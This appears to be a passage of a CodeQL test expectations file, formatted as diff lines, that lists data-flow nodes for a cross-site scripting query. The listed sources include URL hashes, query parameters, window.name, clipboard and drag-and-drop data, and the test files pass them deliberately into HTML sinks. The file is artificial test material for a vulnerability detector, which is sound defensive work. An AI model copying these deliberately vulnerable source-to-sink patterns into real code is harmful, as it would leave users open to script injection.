addEventListener.js:12:24:12:33 | event.data | semmle.label | event.data | -| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | semmle.label | \\u0275getDOM ... ().href | -| angular2-client.ts:26:44:26:69 | this.ro ... .params | semmle.label | this.ro ... .params | -| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | -| angular2-client.ts:27:44:27:74 | this.ro ... yParams | semmle.label | this.ro ... yParams | -| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | -| angular2-client.ts:28:44:28:71 | this.ro ... ragment | semmle.label | this.ro ... ragment | -| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | -| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | -| angular2-client.ts:32:46:32:59 | map.get('foo') | semmle.label | map.get('foo') | -| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | semmle.label | this.ro ... 1].path | -| angular2-client.ts:36:44:36:80 | this.ro ... ameters | semmle.label | this.ro ... ameters | -| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | semmle.label | this.ro ... eters.x | -| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | semmle.label | this.ro ... et('x') | -| angular2-client.ts:38:44:38:89 | this.ro ... .params | semmle.label | this.ro ... .params | -| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | semmle.label | this.ro ... arams.x | -| angular2-client.ts:40:44:40:58 | this.router.url | semmle.label | this.router.url | -| angular2-client.ts:42:45:42:59 | this.router.url | semmle.label | this.router.url | -| angular2-client.ts:43:75:43:105 | this.ro ... yParams | semmle.label | this.ro ... yParams | -| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | -| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | semmle.label | routeSn ... ('foo') | -| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | semmle.label | Cookie.get("unsafe") | -| angular-tempate-url.js:13:30:13:31 | ev | semmle.label | ev | -| angular-tempate-url.js:14:26:14:27 | ev | semmle.label | ev | -| angular-tempate-url.js:14:26:14:32 | ev.data | semmle.label | ev.data | -| classnames.js:7:31:7:84 | `` | semmle.label | `` | -| classnames.js:7:47:7:69 | classNa ... w.name) | semmle.label | classNa ... w.name) | -| classnames.js:7:58:7:68 | window.name | semmle.label | window.name | -| classnames.js:8:31:8:85 | `` | semmle.label | `` | -| classnames.js:8:47:8:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | -| classnames.js:8:59:8:69 | window.name | semmle.label | window.name | -| classnames.js:9:31:9:85 | `` | semmle.label | `` | -| classnames.js:9:47:9:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | -| classnames.js:9:59:9:69 | window.name | semmle.label | window.name | -| classnames.js:10:45:10:55 | window.name | semmle.label | window.name | -| classnames.js:11:31:11:79 | `` | semmle.label | `` | -| classnames.js:11:47:11:64 | unsafeStyle('foo') | semmle.label | unsafeStyle('foo') | -| classnames.js:13:31:13:83 | `` | semmle.label | `` | -| classnames.js:13:47:13:68 | safeSty ... w.name) | semmle.label | safeSty ... w.name) | -| classnames.js:13:57:13:67 | window.name | semmle.label | window.name | -| classnames.js:15:31:15:78 | `` | semmle.label | `` | -| classnames.js:15:47:15:63 | clsx(window.name) | semmle.label | clsx(window.name) | -| classnames.js:15:52:15:62 | window.name | semmle.label | window.name | -| classnames.js:17:32:17:79 | `` | semmle.label | `` | -| classnames.js:17:48:17:64 | clsx(window.name) | semmle.label | clsx(window.name) | -| classnames.js:17:53:17:63 | window.name | semmle.label | window.name | -| clipboard.ts:8:11:8:51 | html | semmle.label | html | -| clipboard.ts:8:18:8:51 | clipboa ... /html') | semmle.label | clipboa ... /html') | -| clipboard.ts:15:25:15:28 | html | semmle.label | html | -| clipboard.ts:24:23:24:58 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | -| clipboard.ts:29:19:29:54 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | -| clipboard.ts:33:19:33:68 | e.origi ... /html') | semmle.label | e.origi ... /html') | -| clipboard.ts:43:15:43:55 | html | semmle.label | html | -| clipboard.ts:43:22:43:55 | clipboa ... /html') | semmle.label | clipboa ... /html') | -| clipboard.ts:50:29:50:32 | html | semmle.label | html | -| clipboard.ts:71:13:71:62 | droppedHtml | semmle.label | droppedHtml | -| clipboard.ts:71:27:71:62 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | -| clipboard.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | -| clipboard.ts:98:15:98:54 | html | semmle.label | html | -| clipboard.ts:98:22:98:54 | dataTra ... /html') | semmle.label | dataTra ... /html') | -| clipboard.ts:99:23:99:26 | html | semmle.label | html | -| custom-element.js:5:26:5:36 | window.name | semmle.label | window.name | -| d3.js:4:12:4:22 | window.name | semmle.label | window.name | -| d3.js:11:15:11:24 | getTaint() | semmle.label | getTaint() | -| d3.js:12:20:12:29 | getTaint() | semmle.label | getTaint() | -| d3.js:14:20:14:29 | getTaint() | semmle.label | getTaint() | -| d3.js:21:15:21:24 | getTaint() | semmle.label | getTaint() | -| dates.js:9:9:9:69 | taint | semmle.label | taint | -| dates.js:9:17:9:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:9:36:9:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:9:36:9:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:11:31:11:70 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:11:42:11:68 | dateFns ... taint) | semmle.label | dateFns ... taint) | -| dates.js:11:63:11:67 | taint | semmle.label | taint | -| dates.js:12:31:12:73 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:12:42:12:71 | dateFns ... taint) | semmle.label | dateFns ... taint) | -| dates.js:12:66:12:70 | taint | semmle.label | taint | -| dates.js:13:31:13:72 | `Time i ... time)}` | semmle.label | `Time i ... time)}` | -| dates.js:13:42:13:70 | dateFns ... )(time) | semmle.label | dateFns ... )(time) | -| dates.js:13:59:13:63 | taint | semmle.label | taint | -| dates.js:16:31:16:69 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:16:42:16:67 | moment( ... (taint) | semmle.label | moment( ... (taint) | -| dates.js:16:62:16:66 | taint | semmle.label | taint | -| dates.js:18:31:18:66 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:18:42:18:64 | datefor ... taint) | semmle.label | datefor ... taint) | -| dates.js:18:59:18:63 | taint | semmle.label | taint | -| dates.js:21:31:21:68 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:21:42:21:66 | dayjs(t ... (taint) | semmle.label | dayjs(t ... (taint) | -| dates.js:21:61:21:65 | taint | semmle.label | taint | -| dates.js:30:9:30:69 | taint | semmle.label | taint | -| dates.js:30:17:30:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:30:36:30:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:30:36:30:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:37:31:37:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:37:42:37:82 | dateFns ... taint) | semmle.label | dateFns ... taint) | -| dates.js:37:77:37:81 | taint | semmle.label | taint | -| dates.js:38:31:38:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:38:42:38:82 | luxon.f ... taint) | semmle.label | luxon.f ... taint) | -| dates.js:38:77:38:81 | taint | semmle.label | taint | -| dates.js:39:31:39:86 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:39:42:39:84 | moment. ... taint) | semmle.label | moment. ... taint) | -| dates.js:39:79:39:83 | taint | semmle.label | taint | -| dates.js:40:31:40:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:40:42:40:82 | dayjs.f ... taint) | semmle.label | dayjs.f ... taint) | -| dates.js:40:77:40:81 | taint | semmle.label | taint | -| dates.js:46:9:46:69 | taint | semmle.label | taint | -| dates.js:46:17:46:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:46:36:46:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:46:36:46:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:48:31:48:90 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:48:42:48:88 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | -| dates.js:48:83:48:87 | taint | semmle.label | taint | -| dates.js:49:31:49:89 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:49:42:49:87 | new Dat ... (taint) | semmle.label | new Dat ... (taint) | -| dates.js:49:82:49:86 | taint | semmle.label | taint | -| dates.js:50:31:50:104 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:50:42:50:102 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | -| dates.js:50:97:50:101 | taint | semmle.label | taint | -| dates.js:54:9:54:69 | taint | semmle.label | taint | -| dates.js:54:17:54:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:54:36:54:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:54:36:54:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:57:31:57:101 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:57:42:57:99 | moment. ... (taint) | semmle.label | moment. ... (taint) | -| dates.js:57:94:57:98 | taint | semmle.label | taint | -| dates.js:59:31:59:87 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:59:42:59:85 | luxon.e ... (taint) | semmle.label | luxon.e ... (taint) | -| dates.js:59:80:59:84 | taint | semmle.label | taint | -| dates.js:61:31:61:88 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:61:42:61:86 | dayjs.s ... (taint) | semmle.label | dayjs.s ... (taint) | -| dates.js:61:81:61:85 | taint | semmle.label | taint | -| dragAndDrop.ts:8:11:8:50 | html | semmle.label | html | -| dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | semmle.label | dataTra ... /html') | -| dragAndDrop.ts:15:25:15:28 | html | semmle.label | html | -| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | -| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | -| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | semmle.label | e.origi ... /html') | -| dragAndDrop.ts:43:15:43:54 | html | semmle.label | html | -| dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | semmle.label | dataTra ... /html') | -| dragAndDrop.ts:50:29:50:32 | html | semmle.label | html | -| dragAndDrop.ts:71:13:71:61 | droppedHtml | semmle.label | droppedHtml | -| dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | -| dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | -| event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | -| event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | -| jquery.js:2:7:2:40 | tainted | semmle.label | tainted | -| jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | -| jquery.js:4:5:4:11 | tainted | semmle.label | tainted | -| jquery.js:5:13:5:19 | tainted | semmle.label | tainted | -| jquery.js:6:11:6:17 | tainted | semmle.label | tainted | -| jquery.js:7:5:7:34 | "
    " | semmle.label | "
    " | -| jquery.js:7:20:7:26 | tainted | semmle.label | tainted | -| jquery.js:8:18:8:34 | "XSS: " + tainted | semmle.label | "XSS: " + tainted | -| jquery.js:8:28:8:34 | tainted | semmle.label | tainted | -| jquery.js:10:5:10:40 | "" + ... "" | semmle.label | "" + ... "" | -| jquery.js:10:13:10:20 | location | semmle.label | location | -| jquery.js:10:13:10:31 | location.toString() | semmle.label | location.toString() | -| jquery.js:14:19:14:58 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| jquery.js:14:38:14:57 | window.location.hash | semmle.label | window.location.hash | -| jquery.js:15:19:15:60 | decodeU ... search) | semmle.label | decodeU ... search) | -| jquery.js:15:38:15:59 | window. ... .search | semmle.label | window. ... .search | -| jquery.js:16:19:16:64 | decodeU ... ring()) | semmle.label | decodeU ... ring()) | -| jquery.js:16:38:16:52 | window.location | semmle.label | window.location | -| jquery.js:16:38:16:63 | window. ... tring() | semmle.label | window. ... tring() | -| jquery.js:18:7:18:33 | hash | semmle.label | hash | -| jquery.js:18:14:18:33 | window.location.hash | semmle.label | window.location.hash | -| jquery.js:21:5:21:8 | hash | semmle.label | hash | -| jquery.js:21:5:21:21 | hash.substring(1) | semmle.label | hash.substring(1) | -| jquery.js:22:5:22:8 | hash | semmle.label | hash | -| jquery.js:22:5:22:25 | hash.su ... (1, 10) | semmle.label | hash.su ... (1, 10) | -| jquery.js:23:5:23:8 | hash | semmle.label | hash | -| jquery.js:23:5:23:18 | hash.substr(1) | semmle.label | hash.substr(1) | -| jquery.js:24:5:24:8 | hash | semmle.label | hash | -| jquery.js:24:5:24:17 | hash.slice(1) | semmle.label | hash.slice(1) | -| jquery.js:27:5:27:8 | hash | semmle.label | hash | -| jquery.js:27:5:27:25 | hash.re ... #', '') | semmle.label | hash.re ... #', '') | -| jquery.js:28:5:28:26 | window. ... .search | semmle.label | window. ... .search | -| jquery.js:28:5:28:43 | window. ... ?', '') | semmle.label | window. ... ?', '') | -| jquery.js:34:5:34:25 | '' + ... '' | semmle.label | '' + ... '' | -| jquery.js:34:13:34:16 | hash | semmle.label | hash | -| jquery.js:36:25:36:31 | tainted | semmle.label | tainted | -| jquery.js:37:25:37:37 | () => tainted | semmle.label | () => tainted | -| jquery.js:37:31:37:37 | tainted | semmle.label | tainted | -| json-stringify.jsx:5:9:5:36 | locale | semmle.label | locale | -| json-stringify.jsx:5:18:5:36 | req.param("locale") | semmle.label | req.param("locale") | -| json-stringify.jsx:11:51:11:56 | locale | semmle.label | locale | -| json-stringify.jsx:19:56:19:61 | locale | semmle.label | locale | -| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | semmle.label | JSON.st ... locale) | -| json-stringify.jsx:31:55:31:60 | locale | semmle.label | locale | -| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | semmle.label | JSON.st ... jsonLD) | -| jwt-server.js:7:9:7:35 | taint | semmle.label | taint | -| jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| jwt-server.js:9:16:9:20 | taint | semmle.label | taint | -| jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | -| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | -| nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | -| optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | -| optionalSanitizer.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| optionalSanitizer.js:6:18:6:23 | target | semmle.label | target | -| optionalSanitizer.js:8:7:8:22 | tainted | semmle.label | tainted | -| optionalSanitizer.js:8:17:8:22 | target | semmle.label | target | -| optionalSanitizer.js:9:18:9:24 | tainted | semmle.label | tainted | -| optionalSanitizer.js:15:9:15:14 | target | semmle.label | target | -| optionalSanitizer.js:16:18:16:18 | x | semmle.label | x | -| optionalSanitizer.js:17:20:17:20 | x | semmle.label | x | -| optionalSanitizer.js:26:7:26:39 | target | semmle.label | target | -| optionalSanitizer.js:26:16:26:39 | documen ... .search | semmle.label | documen ... .search | -| optionalSanitizer.js:28:24:28:24 | x | semmle.label | x | -| optionalSanitizer.js:29:12:29:12 | x | semmle.label | x | -| optionalSanitizer.js:31:7:31:23 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:31:18:31:23 | target | semmle.label | target | -| optionalSanitizer.js:32:18:32:25 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:34:5:34:36 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | semmle.label | sanitiz ... inted2) | -| optionalSanitizer.js:34:28:34:35 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:36:18:36:25 | tainted2 | semmle.label | tainted2 | -| optionalSanitizer.js:38:7:38:23 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:38:18:38:23 | target | semmle.label | target | -| optionalSanitizer.js:39:18:39:25 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:41:5:41:36 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | semmle.label | sanitiz ... inted3) | -| optionalSanitizer.js:41:28:41:35 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:43:18:43:25 | tainted3 | semmle.label | tainted3 | -| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | semmle.label | sanitiz ... target | -| optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | semmle.label | sanitizeBad(target) | -| optionalSanitizer.js:45:41:45:46 | target | semmle.label | target | -| optionalSanitizer.js:45:51:45:56 | target | semmle.label | target | -| pages/[id].jsx:3:30:3:35 | params [id] | semmle.label | params [id] | -| pages/[id].jsx:3:30:3:35 | params [q] | semmle.label | params [q] | -| pages/[id].jsx:5:9:5:14 | { id } | semmle.label | { id } | -| pages/[id].jsx:5:9:5:29 | id | semmle.label | id | -| pages/[id].jsx:5:18:5:29 | router.query | semmle.label | router.query | -| pages/[id].jsx:10:44:10:45 | id | semmle.label | id | -| pages/[id].jsx:13:44:13:49 | params [id] | semmle.label | params [id] | -| pages/[id].jsx:13:44:13:52 | params.id | semmle.label | params.id | -| pages/[id].jsx:16:44:16:49 | params [q] | semmle.label | params [q] | -| pages/[id].jsx:16:44:16:51 | params.q | semmle.label | params.q | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | semmle.label | {\\n ... ,\\n } [id] | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | semmle.label | {\\n ... ,\\n } [q] | -| pages/[id].jsx:25:11:25:24 | context.params | semmle.label | context.params | -| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | semmle.label | context ... d \|\| "" | -| pages/[id].jsx:26:10:26:22 | context.query | semmle.label | context.query | -| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | semmle.label | context ... r \|\| "" | -| react-native.js:7:7:7:33 | tainted | semmle.label | tainted | -| react-native.js:7:17:7:33 | req.param("code") | semmle.label | req.param("code") | -| react-native.js:8:18:8:24 | tainted | semmle.label | tainted | -| react-native.js:9:27:9:33 | tainted | semmle.label | tainted | -| react-use-context.js:10:22:10:32 | window.name | semmle.label | window.name | -| react-use-context.js:16:26:16:36 | window.name | semmle.label | window.name | -| react-use-router.js:8:21:8:32 | router.query | semmle.label | router.query | -| react-use-router.js:8:21:8:39 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-router.js:11:24:11:35 | router.query | semmle.label | router.query | -| react-use-router.js:11:24:11:42 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-router.js:23:43:23:54 | router.query | semmle.label | router.query | -| react-use-router.js:23:43:23:61 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-router.js:33:21:33:32 | router.query | semmle.label | router.query | -| react-use-router.js:33:21:33:39 | router.query.foobar | semmle.label | router.query.foobar | -| react-use-state.js:4:9:4:49 | state | semmle.label | state | -| react-use-state.js:4:38:4:48 | window.name | semmle.label | window.name | -| react-use-state.js:5:51:5:55 | state | semmle.label | state | -| react-use-state.js:9:9:9:43 | state | semmle.label | state | -| react-use-state.js:10:14:10:24 | window.name | semmle.label | window.name | -| react-use-state.js:11:51:11:55 | state | semmle.label | state | -| react-use-state.js:15:9:15:43 | state | semmle.label | state | -| react-use-state.js:15:10:15:14 | state | semmle.label | state | -| react-use-state.js:16:20:16:30 | window.name | semmle.label | window.name | -| react-use-state.js:17:51:17:55 | state | semmle.label | state | -| react-use-state.js:21:10:21:14 | state | semmle.label | state | -| react-use-state.js:22:14:22:17 | prev | semmle.label | prev | -| react-use-state.js:23:35:23:38 | prev | semmle.label | prev | -| react-use-state.js:25:20:25:30 | window.name | semmle.label | window.name | -| sanitiser.js:16:7:16:27 | tainted | semmle.label | tainted | -| sanitiser.js:16:17:16:27 | window.name | semmle.label | window.name | -| sanitiser.js:23:21:23:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:23:29:23:35 | tainted | semmle.label | tainted | -| sanitiser.js:30:21:30:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:30:29:30:35 | tainted | semmle.label | tainted | -| sanitiser.js:33:21:33:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:33:29:33:35 | tainted | semmle.label | tainted | -| sanitiser.js:38:21:38:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:38:29:38:35 | tainted | semmle.label | tainted | -| sanitiser.js:45:21:45:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:45:29:45:35 | tainted | semmle.label | tainted | -| sanitiser.js:48:19:48:25 | tainted | semmle.label | tainted | -| sanitiser.js:48:19:48:46 | tainted ... /g, '') | semmle.label | tainted ... /g, '') | -| stored-xss.js:2:39:2:62 | documen ... .search | semmle.label | documen ... .search | -| stored-xss.js:3:35:3:58 | documen ... .search | semmle.label | documen ... .search | -| stored-xss.js:5:20:5:52 | session ... ssion') | semmle.label | session ... ssion') | -| stored-xss.js:8:20:8:48 | localSt ... local') | semmle.label | localSt ... local') | -| stored-xss.js:10:9:10:44 | href | semmle.label | href | -| stored-xss.js:10:16:10:44 | localSt ... local') | semmle.label | localSt ... local') | -| stored-xss.js:12:20:12:54 | "" | semmle.label | "" | -| stored-xss.js:12:35:12:38 | href | semmle.label | href | -| string-manipulations.js:3:16:3:32 | document.location | semmle.label | document.location | -| string-manipulations.js:4:16:4:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:5:16:5:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:5:16:5:47 | documen ... lueOf() | semmle.label | documen ... lueOf() | -| string-manipulations.js:6:16:6:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:6:16:6:43 | documen ... f.sup() | semmle.label | documen ... f.sup() | -| string-manipulations.js:7:16:7:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:7:16:7:51 | documen ... rCase() | semmle.label | documen ... rCase() | -| string-manipulations.js:8:16:8:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:8:16:8:48 | documen ... mLeft() | semmle.label | documen ... mLeft() | -| string-manipulations.js:9:16:9:58 | String. ... n.href) | semmle.label | String. ... n.href) | -| string-manipulations.js:9:36:9:57 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:10:16:10:45 | String( ... n.href) | semmle.label | String( ... n.href) | -| string-manipulations.js:10:23:10:44 | documen ... on.href | semmle.label | documen ... on.href | -| tainted-url-suffix-arguments.js:3:17:3:17 | y | semmle.label | y | -| tainted-url-suffix-arguments.js:6:22:6:22 | y | semmle.label | y | -| tainted-url-suffix-arguments.js:11:11:11:36 | url | semmle.label | url | -| tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | semmle.label | window.location.href | -| tainted-url-suffix-arguments.js:12:17:12:19 | url | semmle.label | url | -| tooltip.jsx:6:11:6:30 | source | semmle.label | source | -| tooltip.jsx:6:20:6:30 | window.name | semmle.label | window.name | -| tooltip.jsx:10:25:10:30 | source | semmle.label | source | -| tooltip.jsx:11:25:11:30 | source | semmle.label | source | -| tooltip.jsx:17:11:17:33 | provide [source] | semmle.label | provide [source] | -| tooltip.jsx:17:21:17:33 | props.provide [source] | semmle.label | props.provide [source] | -| tooltip.jsx:18:51:18:57 | provide [source] | semmle.label | provide [source] | -| tooltip.jsx:18:51:18:59 | provide() | semmle.label | provide() | -| tooltip.jsx:22:11:22:30 | source | semmle.label | source | -| tooltip.jsx:22:20:22:30 | window.name | semmle.label | window.name | -| tooltip.jsx:23:38:23:43 | source | semmle.label | source | -| translate.js:6:7:6:39 | target | semmle.label | target | -| translate.js:6:16:6:39 | documen ... .search | semmle.label | documen ... .search | -| translate.js:7:7:7:61 | searchParams | semmle.label | searchParams | -| translate.js:7:7:7:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:7:22:7:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| translate.js:7:42:7:47 | target | semmle.label | target | -| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | -| trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | -| trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | -| trusted-types.js:3:62:3:62 | x | semmle.label | x | -| trusted-types.js:3:67:3:67 | x | semmle.label | x | -| trusted-types.js:4:20:4:30 | window.name | semmle.label | window.name | -| trusted-types.js:13:20:13:30 | window.name | semmle.label | window.name | -| tst3.js:2:12:2:75 | JSON.pa ... tr(1))) | semmle.label | JSON.pa ... tr(1))) | -| tst3.js:2:23:2:74 | decodeU ... str(1)) | semmle.label | decodeU ... str(1)) | -| tst3.js:2:42:2:63 | window. ... .search | semmle.label | window. ... .search | -| tst3.js:2:42:2:73 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst3.js:4:25:4:28 | data | semmle.label | data | -| tst3.js:4:25:4:32 | data.src | semmle.label | data.src | -| tst3.js:5:26:5:29 | data | semmle.label | data | -| tst3.js:5:26:5:31 | data.p | semmle.label | data.p | -| tst3.js:7:32:7:35 | data | semmle.label | data | -| tst3.js:7:32:7:37 | data.p | semmle.label | data.p | -| tst3.js:9:37:9:40 | data | semmle.label | data | -| tst3.js:9:37:9:42 | data.p | semmle.label | data.p | -| tst3.js:10:38:10:41 | data | semmle.label | data | -| tst3.js:10:38:10:43 | data.p | semmle.label | data.p | -| tst.js:2:7:2:39 | target | semmle.label | target | -| tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | 